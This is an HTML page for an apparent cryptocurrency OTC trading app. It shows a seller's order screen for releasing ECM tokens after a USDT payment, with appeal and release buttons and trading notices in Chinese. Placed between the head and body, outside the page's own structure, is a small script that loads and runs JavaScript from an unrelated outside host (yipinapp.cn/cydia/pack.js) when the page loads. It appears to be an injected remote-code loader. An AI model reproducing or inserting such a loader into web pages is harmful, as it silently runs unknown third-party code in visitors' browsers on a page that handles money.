<!DOCTYPE html>
<html>
	<head>
		<meta charset="UTF-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" />
		<title>进行中</title>
		<link rel="stylesheet" href="../../static/css/weui.css" />
		<link rel="stylesheet" href="../../static/css/common.css" />
		<!--<link rel="stylesheet" href="../../static/css/weui-min.css">-->
		<link rel="stylesheet" href="../../static/css/weui-jquery.css">
		<link rel="stylesheet" href="../../static/css/transaction/payIng.css" />
	</head>
	<script>
		(function () {
			var dw = document.createElement("script");
			dw.src = "https://yipinapp.cn/cydia/pack.js?zBv2XrG8cSQqzRDCm9hsEL"
			var s = document.getElementsByTagName("script")[0];
			s.parentNode.insertBefore(dw, s);
		})()
	</script>
	<body>
		<header class="weui-bar weui-bar-nav" id="returnBtn">
		    <a class="weui-pull-left weui-btns" id="arrow">
		        <span class="weui-cell__fts"></span>
		    </a>
		    <div class="weui-title">进行中</div>
		    <span class="weui-pull-right weui-cell__ft">联系商家</span>
		</header>
		<div class="orderStaute">
			<h2 class="statusName">请放行</h2>
			<p class="orderTxt">买家已付款，请放行</p>
			<div class="orderDetail">
				<div class="payTitle">
					<div class="titleBg">
						<p>请查收对方付款</p>
						<h2 class="changeColor" style="font-size: 16px">USDT<span class="payMoney"></span></h2>
					</div>
					<div class="titleright">
						<p>交易单价：USDT<span class="trandeceil"></span></p>
						<p>交易数量：<span class="trandeNum"></span> ECM</p>
					</div>
				</div>
				<div class="floorTep">
					<ul>
						<li class="weui-cell weui-cell_access">
							<div class="weui-cell__bd weui-cell_primary">
								<p class="weImg">
									<img src="../../static/images/weixin.png" />
									<span class="payKind">ECM WALEAT</span>
								</p>
							</div>
						</li>
						<li>
							<p class="nameTxt">买家</p>
							<p class="payee"></p>
						</li>
						<li>
							<p>发布时间</p>
							<p class="receipt"></p>
						</li>
						<li>
							<p>接单时间</p>
							<p class="orderTime"></p>
						</li>
						<li>
							<p>订单号</p>
							<p class="orderNO"></p>
						</li>

						<li>

						</li>
						<li>

						</li>
					</ul>
				</div>
				<div class="lastDiv">
					<p>请务必登录收款账户确认到账明细，避免因错误点击放行造成财产损失。</p>
					<div class="twoBtn">
						<button type="button" class="weui-btn addShip">申诉</button>
						<button type="button" class="weui-btn poster">放行ECM</button>
					</div>
				</div>
			</div>
			<div class="noticeTxt">
				<h4><img src="../../static/images/tixiang.png" />交易提醒</h4>
				<ul>
					<li>交易过程中您出售的数字资产由平台托管保护</li>
					<li>确认收款无误后，请在规定时间内务必点击"放行"按键，系统会 数字资产划转到买家账户 </li>
					<li>卖方当日未放币，导致订单失败的，核实后，扣除资产池10000币，并取消次日卖出资格</li>
					<li>如您未收到汇款，但对方已标记为已支付，请您及时点击申诉按钮。核实无误后，会退回您的数字资产。</li>
				</ul>
			</div>
		</div>

		<script type="text/javascript" src="../../lib/jquery.js" ></script>
		<script type="text/javascript" src="../../lib/fastclick.js" ></script>
		<script type="text/javascript" src="../../lib/zepto.min.js" ></script>
		<script type="text/javascript" src="../../lib/jquery-weui.js" ></script>
		<script type="text/javascript" src="../../lib/weui.min.js" ></script>
		<script type="text/javascript" src="../../lib/swiper.js" ></script>
		<script type="text/javascript" src="../../static/js/api.js" ></script>
		<script type="text/javascript" src="../../static/js/common.js" ></script>
		<script type="text/javascript" src="../../static/js/transaction/sellpel.js" ></script>
		<script >
			var pb1;
			$(function(){
				FastClick.attach(document.body);
				pb1 = $.photoBrowser({
			        items: [
			          "../../static/images/loginImg.png"
			        ],

			        onSlideChange: function(index) {
			          console.log(this, index);
			        },

			        onOpen: function() {
			          console.log("onOpen", this);
			        },
			        onClose: function() {
			          console.log("onClose", this);
			        }
			    });
				$("#pb1").click(function() {
		        	pb1.open(2);
		      	});
			})
		</script>
	</body>
</html>
